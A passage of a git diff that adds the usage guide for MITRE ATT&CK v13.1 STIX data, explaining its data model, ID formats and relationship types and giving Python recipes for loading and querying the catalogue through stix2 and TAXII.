+ - `x_capec_can_follow_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object can follow
+ - `x_capec_peer_of_refs`: contains a list of STIX ids of the Attack Pattern objects which the current object is a peer of
+* Added "allow_custom=True" as a flag when creating STIX bundles to satisfy the requirements for the new STIX release
diff --git a/cti-ATT-CK-v13.1/USAGE.md b/cti-ATT-CK-v13.1/USAGE.md
new file mode 100644
index 0000000000000000000000000000000000000000..89aa146075536d1eaaf2f29c0a72231afbaa8d11
--- /dev/null
+++ b/cti-ATT-CK-v13.1/USAGE.md
@@ -0,0 +1,1182 @@ +# Introduction + +This document describes how to query and manipulate ATT&CK data from either this repository or the ATT&CK TAXII server, as well as the formatting of the data itself. + +The programmatic uses of ATT&CK demonstrated in this document utilize the [stix2 python library](https://github.com/oasis-open/cti-python-stix2). Please refer to the [STIX2 Python API Documentation](https://stix2.readthedocs.io/en/latest/) for more information on how to work with STIX programmatically. See also the section on [Requirements and imports](#requirements-and-imports). + +This document describes how ATT&CK implements and extends the STIX format. To find out more about STIX, please see [the STIX 2.0 website](https://oasis-open.github.io/cti-documentation/stix/intro). + +We also recommend reading the [ATT&CK Design and Philosophy Paper](https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf), which describes high-level overall approach, intention, and usage of ATT&CK. + +If you are looking for ATT&CK data represented in STIX 2.1, please see our [attack-stix-data](https://github.com/mitre-attack/attack-stix-data) GitHub repository. The accompanying [USAGE document](https://github.com/mitre-attack/attack-stix-data/blob/master/USAGE.md) includes more information on the improved data model of that repository. 
+ +## Table of Contents + +- [Introduction](#introduction) + - [Table of Contents](#table-of-contents) + - [The ATT&CK data model](#the-attck-data-model) + - [Extensions of the STIX spec](#extensions-of-the-stix-spec) + - [IDs in ATT&CK](#ids-in-attck) + - [ATT&CK IDs](#attck-ids) + - [STIX IDs](#stix-ids) + - [Other IDs](#other-ids) + - [ATT&CK Types](#attck-types) + - [Matrices](#matrices) + - [Mapping matrices, tactics and techniques](#mapping-matrices-tactics-and-techniques) + - [Tactics](#tactics) + - [Techniques](#techniques) + - [Sub-Techniques](#sub-techniques) + - [Procedures](#procedures) + - [Mitigations](#mitigations) + - [Collisions with technique ATT&CK IDs](#collisions-with-technique-attck-ids) + - [Groups](#groups) + - [Software](#software) + - [Data Sources and Data Components](#data-sources-and-data-components) + - [Data Sources](#data-sources) + - [Data Components](#data-components) + - [Campaigns](#campaigns) + - [Relationships](#relationships) + - [Accessing ATT&CK data in python](#accessing-attck-data-in-python) + - [Requirements and imports](#requirements-and-imports) + - [stix2](#stix2) + - [taxii2client](#taxii2client) + - [Access local content](#access-local-content) + - [Access via FileSystemSource](#access-via-filesystemsource) + - [Access via bundle](#access-via-bundle) + - [Access live content](#access-live-content) + - [Access from the ATT&CK TAXII server](#access-from-the-attck-taxii-server) + - [Access from Github via requests](#access-from-github-via-requests) + - [Access a specific version of ATT&CK](#access-a-specific-version-of-attck) + - [Access multiple domains simultaneously](#access-multiple-domains-simultaneously) + - [Python recipes](#python-recipes) + - [Getting an object](#getting-an-object) + - [By STIX ID](#by-stix-id) + - [By ATT&CK ID](#by-attck-id) + - [By name](#by-name) + - [By alias](#by-alias) + - [Getting multiple objects](#getting-multiple-objects) + - [Objects by type](#objects-by-type) + - [Getting 
techniques or sub-techniques](#getting-techniques-or-sub-techniques) + - [Getting software](#getting-software) + - [Objects by content](#objects-by-content) + - [Techniques by platform](#techniques-by-platform) + - [Techniques by tactic](#techniques-by-tactic) + - [Tactics by matrix](#tactics-by-matrix) + - [Objects created or modified since a given date](#objects-created-or-modified-since-a-given-date) + - [Getting related objects](#getting-related-objects) + - [Relationships microlibrary](#relationships-microlibrary) + - [Getting techniques used by a group's software](#getting-techniques-used-by-a-groups-software) + - [Working with deprecated and revoked objects](#working-with-deprecated-and-revoked-objects) + - [Removing revoked and deprecated objects](#removing-revoked-and-deprecated-objects) + - [Getting a revoking object](#getting-a-revoking-object) + +## The ATT&CK data model + +The data in this repository is STIX 2.0 and divided into folders, one for each domain of ATT&CK. These domains generally follow the same format with a few departures. Domain differences will be noted in the relevant sections of this document. + +ATT&CK uses a mix of predefined and custom STIX objects to implement ATT&CK concepts. The following table is a mapping of ATT&CK concepts to STIX 2.0 objects: + +| ATT&CK concept | STIX object type | Custom type? 
| +|:------------|:----------|:---| +| [Matrix](#matrices) | `x-mitre-matrix` | yes | +| [Tactic](#tactics) | `x-mitre-tactic` | yes | +| [Technique](#techniques) | [attack-pattern](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230921) | no | +| [Sub-technique](#sub-techniques) | [attack-pattern](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230921) where `x_mitre_is_subtechnique = true` | no | +| [Procedure](#procedures) | [relationship](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230970) where `relationship_type = "uses"` and `target_ref` is an `attack-pattern` | no | +| [Mitigation](#mitigations) | [course-of-action](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230929) | no | +| [Group](#groups) | [intrusion-set](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230941) | no | +| [Software](#software) | [malware](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230945) or [tool](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230961) | no | +| [Data Source](#data-source) | `x-mitre-data-source` | yes | +| [Campaign](#campaigns) | [campaign](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230925) | no | + +Two additional object types are found in the ATT&CK catalog: + +| STIX object type | About | +|:-----------------|:------| +| [identity](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230933) | Referenced in the `created_by_ref` of all 
objects to state that the MITRE Corporation created the object | +| [marking-definition](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part1-stix-core/stix-v2.0-csprd01-part1-stix-core.html#_Toc476227338) | Referenced in the `object_marking_refs` of all objects to express the MITRE Corporation copyright | + +### Extensions of the STIX spec + +There are three general ways that ATT&CK extends the STIX 2.0 format: + +- Custom object types. Object types prefixed with `x-mitre-`, e.g `x-mitre-matrix`, are custom STIX types extending the STIX 2.0 spec. They follow the general [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920) but describe concepts not covered by types defined in STIX 2.0. + +- Extensions of existing object types. Fields extending the STIX 2.0 spec are prefixed with `x_mitre_`, e.g `x_mitre_platforms` in `attack-patterns`. + + All objects except relationships can have the following extended properties applied: + + | Field | Type | Description | + |:------|:-----|:------------| + | `x_mitre_version` | string | The version of the object in format `major.minor` where `major` and `minor` are integers. ATT&CK increments this version number when the object content is updated. | + | `x_mitre_contributors` | string[] | People and organizations who have contributed to the object. | + | `x_mitre_deprecated` | boolean | See [Working with deprecated and revoked objects](#Working-with-deprecated-and-revoked-objects). | + +- New relationship types. Unlike custom object types and extended fields, custom relationship types are **not** prefixed with `x_mitre_`. You can find a full list of relationship types in the [Relationships](#Relationships) section, which also mentions whether the type is a default STIX type. 
+ +Please see also the STIX documentation on [customizing STIX](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part1-stix-core/stix-v2.0-csprd01-part1-stix-core.html#_Toc476227365). + +### IDs in ATT&CK + +Objects in ATT&CK may have several different kinds of IDs. + +#### ATT&CK IDs + +The most commonly used ID format is what is referred to as the ATT&CK ID or simply ID. Each different type of ATT&CK object has its own variation upon the ATT&CK ID format: + +| ATT&CK concept | ID format | +|:------------|:----------| +| [Matrix](#matrices) | `MAxxxx` | +| [Tactic](#tactics) | `TAxxxx` | +| [Technique](#techniques) | `Txxxx` | +| [Sub-Technique](#sub-techniques) | `Txxxx.yyy` | +| [Mitigation](#mitigations) | `Mxxxx` | +| [Group](#groups) | `Gxxxx` | +| [Software](#software) | `Sxxxx` | +| [Data Source](#data-source) | `DSxxxx` | +| [Campaign](#campaigns) | `Cxxxx` | + +ATT&CK IDs are typically, but not always, unique. See [Collisions with Technique ATT&CK IDs](#collisions-with-technique-attck-ids) for an edge case involving ID collisions between mitigations and techniques. + +ATT&CK IDs can be found in the first external reference of all objects except for relationships (which don't have ATT&CK IDs). The first external reference also includes a `url` field linking to the page describing that object on the [ATT&CK Website](https://attack.mitre.org/). + +#### STIX IDs + +In addition to ATT&CK IDs, all objects in ATT&CK (including relationships) have STIX IDs in the `id` field of the object. Unlike ATT&CK IDs, STIX IDs are guaranteed to be unique. STIX IDs are therefore the best way to retrieve and refer to objects programmatically. + +#### Other IDs + +Several other IDs can be found in the external references of an object: + +1. NIST Mobile Threat Catalogue IDs can be found for some techniques in the Mobile domain where the external reference `source_name` is `"NIST Mobile Threat Catalogue"` +2. 
CAPEC IDs can be found for some techniques in the Enterprise domain where the external reference `source_name` is `"capec"` + +### ATT&CK Types + +#### Matrices + +The overall layout of the ATT&CK Matrices is stored in `x-mitre-matrix` objects. As a custom STIX type they follow only the generic [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920). + +Matrices extend the generic SDO format with the following field: + +| Field | Type | Description | +|:------|:-----|-------------| +| `tactic_refs` | string[] | The `tactic_refs` array of the matrix contains an ordered list of `x-mitre-tactic` STIX IDs corresponding to the tactics of the matrix. The order of `tactic_refs` determines the order the tactics should appear within the matrix. | + +##### Mapping matrices, tactics and techniques + +Techniques map into tactics by use of their `kill_chain_phases` property. Where the `kill_chain_name` is `mitre-attack`, `mitre-mobile-attack`, or `mitre-ics-attack` (for enterprise, mobile, and ics domains respectively), the `phase_name` corresponds to the `x_mitre_shortname` property of an `x-mitre-tactic` object. Matrices define their tactics in order using the `tactic_refs` embedded relationships. + +matrix, tactic and technique data model + +#### Tactics + +A Tactic in ATT&CK is defined by an `x-mitre-tactic` object. As a custom STIX type they follow only the generic [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920). + +Tactics extend the generic SDO format with the following field: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_shortname` | string | The `x_mitre_shortname` of the tactic is used for mapping techniques into the tactic. It corresponds to `kill_chain_phases.phase_name` of the techniques in the tactic. 
See [mapping matrices, tactics and techniques](#mapping-matrices-tactics-and-techniques) for more information. | + +#### Techniques + +A Technique in ATT&CK is defined as an [attack-pattern](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230921) object. + +Techniques depart from the attack-pattern format with the following fields. Domain and tactic specific fields are marked in the "applies to" column: + +| Field | Type | Applies to | Description | +|:------|:-----|:--------|:------------| +| `x_mitre_detection` | string | All techniques | Strategies for identifying if a technique has been used by an adversary. | +| `x_mitre_platforms` | string[] | All techniques | List of platforms that apply to the technique. | +| `x_mitre_data_sources` | string[] | Enterprise* & ICS domains | Sources of information that may be used to identify the action or result of the action being performed. | +| `x_mitre_is_subtechnique` | boolean | Enterprise domain | If true, this `attack-pattern` is a sub-technique. See [sub-techniques](#sub-techniques). | +| `x_mitre_system_requirements` | string[] | Enterprise domain | Additional information on requirements the adversary needs to meet or about the state of the system (software, patch level, etc.) that may be required for the technique to work. | +| `x_mitre_tactic_type` | string[] | Mobile domain | "Post-Adversary Device Access", "Pre-Adversary Device Access", or "Without Adversary Device Access". | +| `x_mitre_permissions_required` | string[] | Enterprise domain in the _Privilege Escalation_ tactic | The lowest level of permissions the adversary is required to be operating within to perform the technique on a system. | +| `x_mitre_effective_permissions` | string[] | Enterprise domain in the _Privilege Escalation_ tactic | The level of permissions the adversary will attain by performing the technique. 
| +| `x_mitre_defense_bypassed` | string[] | Enterprise domain in the _Defense Evasion_ tactic | List of defensive tools, methodologies, or processes the technique can bypass. | +| `x_mitre_remote_support` | boolean | Enterprise domain in the _Execution_ tactic | If true, the technique can be used to execute something on a remote system. | +| `x_mitre_impact_type` | string[] | Enterprise domain in the _Impact_ tactic | Denotes if the technique can be used for integrity or availability attacks. | + +\* In the Enterprise domain data sources are represented via [x-mitre-data-source](#data-sources) and [x-mitre-data-component](#data-components) objects, and their relationship with techniques through relationships of type `detects`. The `x_mitre_data_sources` field will still be maintained on enterprise techniques for backwards-compatibility purposes but we advise against its use as it does not include the full context of the data model. + +See [mapping matrices, tactics and techniques](#mapping-matrices-tactics-and-techniques) for more information about how techniques map into tactics and matrices. + +##### Sub-Techniques + +A sub-technique in ATT&CK is represented as an `attack-pattern` and follows the same format as [techniques](#techniques). They differ in that they have a boolean field (`x_mitre_is_subtechnique`) marking them as sub-techniques, and a relationship of the type `subtechnique-of` where the `source_ref` is the sub-technique and the `target_ref` is the parent technique. A sub-technique can only have 1 parent technique, but techniques can have multiple sub-techniques. + +Additionally: + +- Sub-technique ATT&CK IDs are a suffix of their parent IDs. For a given sub-technique ID `Txxxx.yyy`, `Txxxx` is the parent technique ID and `yyy` is the sub-technique ID. Sub-techniques have unique STIX IDs. +- Sub-techniques have the same tactics as their parent technique. +- Sub-techniques have a subset of their parent technique's platforms. 
+ +Sub-techniques only exist in the enterprise domain. + +#### Procedures + +ATT&CK does not represent procedures under their own STIX type. Instead, procedures are represented as relationships of type `uses` where the `target_ref` is a technique. This means that procedures can stem from usage by both groups (`intrusion-set`s) and software (`malware` or `tool`s). The content of the procedure is described in the relationship description. + +#### Mitigations + +A Mitigation in ATT&CK is defined as a [course-of-action](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230929) object. ATT&CK Mitigations do not depart from the STIX `course-of-action` spec. + +##### Collisions with technique ATT&CK IDs + +In ATT&CK versions prior to v5 (released in July of 2019), mitigations had 1:1 relationships with techniques and shared their technique's ID. These old 1:1 mitigations are deprecated in subsequent ATT&CK releases, and can be filtered out in queries — see [Removing revoked and deprecated objects](#Removing-revoked-and-deprecated-objects). + +#### Groups + +A Group in ATT&CK is defined as an [intrusion-set](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230941) object. ATT&CK Groups do not depart from the STIX `intrusion-set` format. + +#### Software + +Software in ATT&CK is the union of two distinct STIX types: [malware](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230945) and [tool](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230961). + +Both `malware` and `tool` type software depart from the STIX format with the following fields: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_platforms` | string[] | List of platforms that apply to the software. 
| +| `x_mitre_aliases` | string[] | List of aliases for the given software. | + +#### Data Sources and Data Components + +Data Sources and Data Components represent data which can be used to detect techniques. Data components are nested within a data source but have their own STIX object. + +- A Data Component can only have one parent Data Source. +- A Data Source can have any number of Data Components. +- Data Components can map to any number of techniques. + +The general structure of data sources and data components is as follows: + + +```sh + "detects" x_mitre_data_source_ref + relationship embedded relationship + │ │ +┌───────────┐ ▼ ┌────────────────┐ │ ┌───────────┐ +│Technique 1│◄────┤ │ │ │ │ +└───────────┘ │ │ ▼ │ │ + │Data Component 1├────►│ │ +┌───────────┐ │ │ │ │ +│Technique 2│◄────┤ │ │Data Source│ +└───────────┘ └────────────────┘ │ │ + │ │ +┌───────────┐ ┌────────────────┐ │ │ +│Technique 3│◄────┤Data Component 2├────►│ │ +└───────────┘ └────────────────┘ └───────────┘ +``` + +Prior to ATT&CK v10 data sources were stored in a `x_mitre_data_sources` field on techniques. This representation is still available for backwards-compatibility purposes, and does properly reflect the current set of data sources. However, because information is lost in that representation we advise against using it except in legacy applications. The ATT&CK for ICS domain still uses only the `x_mitre_data_sources` field. + +##### Data Sources + +A Data Source in ATT&CK is defined by an `x-mitre-data-source` object. As a custom STIX type they follow only the generic [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920). + +Data Sources extend the generic SDO format with the following fields: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_platforms` | string[] | List of platforms that apply to the data source. 
| +| `x_mitre_collection_layers` | string[] | List of places the data can be collected from. | + +##### Data Components + +A Data Component in ATT&CK is represented as an `x-mitre-data-component` object. As a custom STIX type they follow only the generic [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920). + +Data Components extend the generic SDO format with the following field: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_data_source_ref` | embedded relationship (string) | STIX ID of the data source this component is a part of. | + +#### Campaigns + +A Campaign in ATT&CK is defined as a [campaign](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230925) object. + +Campaigns extend the generic SDO format with the following fields: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_first_seen_citation` | string | One to many citations for when the Campaign was first reported in the form “(Citation: \)” where \ can be found as one of the source_name of one of the external_references. | +| `x_mitre_last_seen_citation` | string | One to many citations for when the Campaign was last reported in the form “(Citation: \)” where \ can be found as one of the source_name of one of the external_references. + +#### Relationships + +Objects in ATT&CK are related to each other via STIX [relationship](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230970) objects. These relationships convey concepts like groups using techniques (also called "procedure examples" on the technique pages), the hierarchy of techniques and sub-techniques, and so on. + +relationships data model + +Unlike other objects in the dataset, relationships cannot be revoked or deprecated. 
Relationships are considered deprecated/revoked if one of the objects it is attached to is revoked or deprecated. See [Working with deprecated and revoked objects](#Working-with-deprecated-and-revoked-objects) for more information on revoked objects. + +Relationships oftentimes have descriptions which contextualize the relationship between the objects. + +| Source Type | Relationship Type | Target Type | Custom Type? | About | +|:------------|:------------------|:------------|:----|:------| +| `intrusion-set` | `uses` | `malware` or `tool` | No | Group using a software. | +| `intrusion-set` | `uses` | `attack-pattern` | No | Group using a technique, which is also considered a procedure example. | +| `malware` or `tool` | `uses` | `attack-pattern` | No | Software using a technique, which is also considered a procedure example. | +| `campaign` | `uses` | `malware` or `tool` | No | Campaign using a software. | +| `campaign` | `uses` | `attack-pattern` | No | Campaign using a technique, which is also considered a procedure example. | +| `campaign` | `attributed-to` | `intrusion-set` | No | Campaign attributed to a group. | +| `course-of-action` | `mitigates` | `attack-pattern` | No | Mitigation mitigating a technique. | +| `attack-pattern` | `subtechnique-of` | `attack-pattern` | Yes | Sub-technique of a technique, where the `source_ref` is the sub-technique and the `target_ref` is the parent technique. | +| `x-mitre-data-component` | `detects` | `attack-pattern` | Yes | Data component detecting a technique. | +| any type | `revoked-by` | any type | Yes | The target object is a replacement for the source object. Only occurs where the objects are of the same type, and the source object will have the property `revoked = true`. See [Working with deprecated and revoked objects](#Working-with-deprecated-and-revoked-objects) for more information on revoked objects. 
| + +Note that because groups use software and software uses techniques, groups can be considered indirect users of techniques used by their software. See [Getting techniques used by a group's software](#Getting-techniques-used-by-a-groups-software). + +## Accessing ATT&CK data in python + +There are several ways to acquire the ATT&CK data in Python. All of them will provide an object +implementing the DataStore API and can be used interchangeably with the recipes provided in the [Python recipes](#Python-Recipes) section. + +This section utilizes the [stix2 python library](https://github.com/oasis-open/cti-python-stix2). Please refer to the [STIX2 Python API Documentation](https://stix2.readthedocs.io/en/latest/) for more information on how to work with STIX programmatically. + +### Requirements and imports + +Before installing requirements, we recommend setting up a virtual environment: + +1. Create virtual environment: + - macOS and Linux: `python3 -m venv env` + - Windows: `py -m venv env` +2. Activate the virtual environment: + - macOS and Linux: `source env/bin/activate` + - Windows: `env/Scripts/activate.bat` + +#### stix2 + +[stix2 can be installed by following the instructions on their repository](https://github.com/oasis-open/cti-python-stix2#installation). Imports for the recipes in this repository can be done from the base package, for example: + +```python +from stix2 import Filter +``` + +However, if you are aiming to extend the ATT&CK dataset with new objects or implement complex workflows, you may need to use the `v20` specifier for some imports. This ensures that the objects use the STIX 2.0 API instead of the STIX 2.1 API. For example: + +```python +from stix2.v20 import AttackPattern +``` + +You can see a full list of the classes which have versioned imports [here](https://stix2.readthedocs.io/en/latest/api/stix2.v20.html). 
+ +#### taxii2client + +[taxii2-client can be installed by following the instructions on their repository](https://github.com/oasis-open/cti-taxii-client#installation). The ATT&CK TAXII server implements the 2.0 version of the TAXII specification, but the default import of `taxii2client` (version 2.0.0 and above) uses the 2.1 version of the TAXII specification, which can lead to 406 responses when connecting to our TAXII server if not accounted for. + +If the TAXII Client is getting a 406 Response, make sure you are running the latest version (`pip install --upgrade stix2` or `pip install --upgrade taxii2-client`). In addition, make sure you are running the 2.0 version of the client (using the `v20` import) as shown below in order to communicate with the ATT&CK TAXII 2.0 Server. + +```python +from taxii2client.v20 import Collection +``` + +### Access local content + +Many users may opt to access the ATT&CK content via a local copy of the STIX data on this repo. This can be advantageous for several reasons: + +- Doesn't require internet access after the initial download +- User can modify the ATT&CK content if desired +- Downloaded copy is static, so updates to the ATT&CK catalog won't cause bugs in automated workflows. User can still manually update by cloning a fresh version of the data + +#### Access via FileSystemSource + +Each domain in this repo is formatted according to the [STIX2 FileSystem spec](https://stix2.readthedocs.io/en/latest/guide/filesystem.html). 
+Therefore you can use a `FileSystemSource` to load a domain, for example to load the enterprise-attack domain: + +```python +from stix2 import FileSystemSource + +src = FileSystemSource('./cti/enterprise-attack') +``` + +#### Access via bundle + +If you instead prefer to download just the domain bundle, e.g [enterprise-attack.json](/enterprise-attack/enterprise-attack.json), you can still load this using a MemoryStore: + +```python +from stix2 import MemoryStore + +src = MemoryStore() +src.load_from_file("enterprise-attack.json") +``` + +### Access live content + +Some users may instead prefer to access "live" ATT&CK content over the internet. This is advantageous for several reasons: + +- Always stays up to date with the evolving ATT&CK catalog +- Doesn't require an initial download of the ATT&CK content, generally requires less setup + +#### Access from the ATT&CK TAXII server + +Users can access the ATT&CK data from the official ATT&CK TAXII server. In TAXII, the ATT&CK domains are represented as collections with static IDs: + +| domain | collection ID | +|:-------|:--------------| +| `enterprise-attack` | `95ecc380-afe9-11e4-9b6c-751b66dd541e` | +| `mobile-attack` | `2f669986-b40b-4423-b720-4396ca6a462b` | +| `ics-attack` | `02c3ef24-9cd4-48f3-a99f-b74ce24f1d34` | + +You can also get a list of available collection from the server directly: + +```python +from taxii2client.v20 import Server # only specify v20 if your installed version is >= 2.0.0 + +server = Server("https://cti-taxii.mitre.org/taxii/") +api_root = server.api_roots[0] +# Print name and ID of all ATT&CK domains available as collections +for collection in api_root.collections: + print(collection.title.ljust(20) + collection.id) +``` + +The following recipe demonstrates how to access the enterprise-attack data from the TAXII server. 
+ +```python +from stix2 import TAXIICollectionSource +from taxii2client.v20 import Collection # only specify v20 if your installed version is >= 2.0.0 + +collections = { + "enterprise_attack": "95ecc380-afe9-11e4-9b6c-751b66dd541e", + "mobile_attack": "2f669986-b40b-4423-b720-4396ca6a462b", + "ics-attack": "02c3ef24-9cd4-48f3-a99f-b74ce24f1d34" +} + +collection = Collection(f"https://cti-taxii.mitre.org/stix/collections/{collections['enterprise_attack']}/") +src = TAXIICollectionSource(collection) +``` + +For more about TAXII, please see oasis-open's [Introduction to TAXII](https://oasis-open.github.io/cti-documentation/taxii/intro). + +#### Access from Github via requests + +Users can alternatively access the data from MITRE/CTI using HTTP requests, and load the resulting content into a MemoryStore. +While typically the TAXII method is more desirable for "live" access, this method can be useful if you want to +access data on a branch of the MITRE/CTI repo (the TAXII server only holds the master branch) or in the case of a TAXII server outage. + +```python +import requests +from stix2 import MemoryStore + +def get_data_from_branch(domain, branch="master"): + """get the ATT&CK STIX data from MITRE/CTI. Domain should be 'enterprise-attack', 'mobile-attack' or 'ics-attack'. Branch should typically be master.""" + stix_json = requests.get(f"https://raw.githubusercontent.com/mitre/cti/{branch}/{domain}/{domain}.json").json() + return MemoryStore(stix_data=stix_json["objects"]) + +src = get_data_from_branch("enterprise-attack") +``` + +### Access a specific version of ATT&CK + +ATT&CK versions are tracked on the MITRE/CTI repo using [tags](https://github.com/mitre/cti/tags). Tags prefixed with `ATT&CK-v` correspond to ATT&CK versions and tags prefixed with `CAPEC-v` correspond to CAPEC versions. You can find more information about ATT&CK versions on the [versions of ATT&CK page](https://attack.mitre.org/resources/versions/) on the ATT&CK website. 
+ +In addition to checking out the repo under the tag for a given version or downloading the STIX from github using your browser, you can also use a variation on the [requests method](#access-from-github-via-requests) to access a particular version of ATT&CK: + +```python +import requests +from stix2 import MemoryStore + +def get_data_from_version(domain, version): + """get the ATT&CK STIX data for the given version from MITRE/CTI. Domain should be 'enterprise-attack', 'mobile-attack' or 'ics-attack'.""" + stix_json = requests.get(f"https://raw.githubusercontent.com/mitre/cti/ATT%26CK-v{version}/{domain}/{domain}.json").json() + return MemoryStore(stix_data=stix_json["objects"]) + +src = get_data_from_version("enterprise-attack", "5.2") +``` + +You can get a list of ATT&CK versions programmatically using the github API: + +```python +import requests +import re + +refToTag = re.compile(r"ATT&CK-v(.*)") +tags = requests.get("https://api.github.com/repos/mitre/cti/git/refs/tags").json() +versions = list(map(lambda tag: refToTag.search(tag["ref"]).groups()[0] , filter(lambda tag: "ATT&CK-v" in tag["ref"], tags))) +# versions = ["1.0", "2.0", ...] +``` + +### Access multiple domains simultaneously + +Because ATT&CK is stored in multiple domains (as of this writing, enterprise-attack, mobile-attack and ics-attack), the above methodologies will only allow you to work +with a single domain at a time. While oftentimes the hard separation of domains is advantageous, occasionally it is useful to combine +domains into a single DataStore. Use any of the methods above to acquire the individual datastores, and then use the following approach to combine them into +a single CompositeDataSource: + +```python +from stix2 import CompositeDataSource + +src = CompositeDataSource() +src.add_data_sources([enterprise_attack_src, mobile_attack_src, ics_attack_src]) +``` + +You can then use this CompositeDataSource just as you would the DataSource for an individual domain. 
+
+## Python recipes
+
+Below are example python recipes which can be used to work with ATT&CK data. They assume the existence of an object implementing the DataStore API. Any of the methods outlined in the [Accessing ATT&CK data in python](#accessing-ATTCK-Data-in-Python) section should provide an object implementing this API.
+
+This section utilizes the [stix2 python library](https://github.com/oasis-open/cti-python-stix2). Please refer to the [STIX2 Python API Documentation](https://stix2.readthedocs.io/en/latest/) for more information on how to work with STIX programmatically. See also the section on [Requirements and imports](#requirements-and-imports).
+
+### Getting an object
+
+The recipes in this section address how to query the dataset for a single object.
+
+#### By STIX ID
+
+The following recipe can be used to retrieve an object according to its STIX ID. This is typically the preferred way to retrieve objects when working with ATT&CK data because STIX IDs are guaranteed to be unique.
+
+```python
+g0075 = src.get("intrusion-set--f40eb8ce-2a74-4e56-89a1-227021410142")
+```
+
+#### By ATT&CK ID
+
+The following recipe can be used to retrieve an object according to its ATT&CK ID:
+
+```python
+from stix2 import Filter
+
+g0075 = src.query([ Filter("external_references.external_id", "=", "G0075") ])[0]
+```
+
+Note: in prior versions of ATT&CK, mitigations had 1:1 relationships with techniques and shared their technique's ID. Therefore the above method does not work properly for techniques because technique ATTT&CK IDs are not truly unique. By specifying the STIX type you're looking for as `attack-pattern` you can avoid this issue.
+
+```python
+from stix2 import Filter
+
+t1134 = src.query([
+ Filter("external_references.external_id", "=", "T1134"),
+ Filter("type", "=", "attack-pattern")
+])[0]
+```
+
+The old 1:1 mitigations causing this issue are deprecated, so you can also filter them out that way — see [Removing revoked and deprecated objects](#Removing-revoked-and-deprecated-objects).
+
+#### By name
+
+The following recipe retrieves an object according to its name:
+
+```python
+from stix2 import Filter
+
+def get_technique_by_name(thesrc, name):
+ filt = [
+ Filter('type', '=', 'attack-pattern'),
+ Filter('name', '=', name)
+ ]
+ return thesrc.query(filt)
+# get the technique titled "System Information Discovery"
+get_technique_by_name(src, 'System Information Discovery')
+```
+
+#### By alias
+
+The following methodology can be used to find the group corresponding to a given alias:
+
+```python
+from stix2 import Filter
+
+def get_group_by_alias(thesrc, alias):
+ return thesrc.query([
+ Filter('type', '=', 'intrusion-set'),
+ Filter('aliases', '=', alias)
+ ])[0]
+
+get_group_by_alias(src, 'Cozy Bear')
+```
+
+### Getting multiple objects
+
+The recipes in this section address how to query the dataset for multiple objects.
+
+⚠ When working with queries to return objects based on a set of characteristics, it is likely that you'll end up with a few objects which are no longer maintained by ATT&CK. These are objects marked as deprecated or revoked. We keep these outdated objects around so that workflows depending on them don't break, but we recommend you avoid using them when possible. Please see the section [Working with deprecated and revoked objects](#Working-with-deprecated-and-revoked-objects) for more information.
+
+#### Objects by type
+
+See [The ATT&CK data model](#The-ATTCK-Data-Model) for mappings of ATT&CK type to STIX type.
+
+```python
+from stix2 import Filter
+
+# use the appropriate STIX type in the query according to the desired ATT&CK type
+groups = src.query([ Filter("type", "=", "intrusion-set") ])
+```
+
+##### Getting techniques or sub-techniques
+
+ATT&CK Techniques and sub-techniques are both represented as `attack-pattern` objects. Therefore further parsing is necessary to get specifically techniques or sub-techniques.
+
+```python
